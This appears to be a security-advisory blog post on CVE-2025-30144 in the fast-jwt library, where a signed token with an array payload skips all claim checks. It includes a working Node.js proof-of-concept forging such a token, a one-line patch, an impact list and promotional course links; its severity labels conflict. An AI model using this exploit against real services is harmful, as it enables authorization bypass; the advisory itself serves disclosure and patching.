Listen to this Post
CVE-2025-30144 is a critical logical vulnerability residing in the JavaScript JSON Web Token (JWT) library fast-jwt, specifically within its decoder and verifier mechanisms.
The flaw is triggered when a validly-signed JWT carries a JSON array as its payload instead of the expected JSON object, violating RFC 7519 section 7.2 step 10.
While the library’s header validation correctly verifies that headers are non-array objects using an explicit array check, the payload validation check only inspects typeof payload !== 'object'.
Because JavaScript evaluates `typeof []` as 'object', an array payload successfully passes through the decoder stage without triggering any format or structural errors.
Once the decoder accepts the array payload, it passes the data structure into the verifier’s validator loop.
Every individual claim validator in `fast-jwt` relies on the `in` operator (such as !(claim in payload)) to ensure required security claims exist.
Because JavaScript arrays possess only numeric indices and a length property, checking string claim keys like `’exp’ in []` or `’iss’ in []` always evaluates to false.
Consequently, the validator loop executes a `continue` statement on every claim check, silently skipping expiration (exp), not-before (nbf), issuer (iss), audience (aud), subject (sub), token ID (jti), and nonce validators.
The verifier returns success and outputs the raw array payload directly to the application, having enforced solely the cryptographic signature while completely bypassing all configured authorization constraints.
DailyCVE Form:
Platform: fast-jwt
Version: Below 5.0.6
Vulnerability : Authorization bypass
Severity: Moderate
date: March 2025
Prediction: Already patched
(end of form)
What Undercode Say
npm install [email protected] node -e "const { createVerifier } = require('fast-jwt');"
const { createVerifier } = require('fast-jwt')
const crypto = require('crypto')
const key = 'shared-secret'
const header = Buffer.from(JSON.stringify({ alg: 'HS256', typ: 'JWT' })).toString('base64url')
const payload = Buffer.from(JSON.stringify(['attacker', 'role:admin'])).toString('base64url')
const sig = crypto.createHmac('sha256', key).update(<code>${header}.${payload}</code>).digest('base64url')
const token = `${header}.${payload}.${sig}`
const verify = createVerifier({
key,
allowedIss: ['legit-issuer'],
allowedAud: ['legit-audience'],
allowedSub: ['legit-subject']
})
console.log(verify(token))
Exploit: (Educational Purposes!)
The exploit constructs a maliciously crafted JWT where the cryptographic signature is validly computed over a header and a JSON array payload (['attacker', 'role:admin']). When processed by createVerifier, the decoder fails to detect that the payload is an array rather than an object. During the validation phase, all claim checks (allowedIss, allowedAud, allowedSub, and expiration) are bypassed because string-based property lookups on arrays return false. The verifier accepts the token and returns the array payload without throwing any security exceptions.
Protection: from this CVE
Upgrade the `fast-jwt` library to version 5.0.6 or later. Alternatively, apply a patch to `src/decoder.js` at line 65 to ensure that array payloads are explicitly rejected alongside non-object types by adding an `Array.isArray(payload)` check:
if (!payload || typeof payload !== 'object' || Array.isArray(payload)) {
throw new TokenError(TokenError.codes.invalidPayload, 'The payload must be an object', { payload })
}
Impact
This vulnerability results in a silent authorization-validator bypass. Attackers can generate forever-tokens bypassing expiration checks, perform cross-service replay attacks by bypassing audience restrictions, spoof issuers in federated OIDC setups, bypass revocation lists via missing `jti` claims, and corrupt audit trails due to missing subject identifiers.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

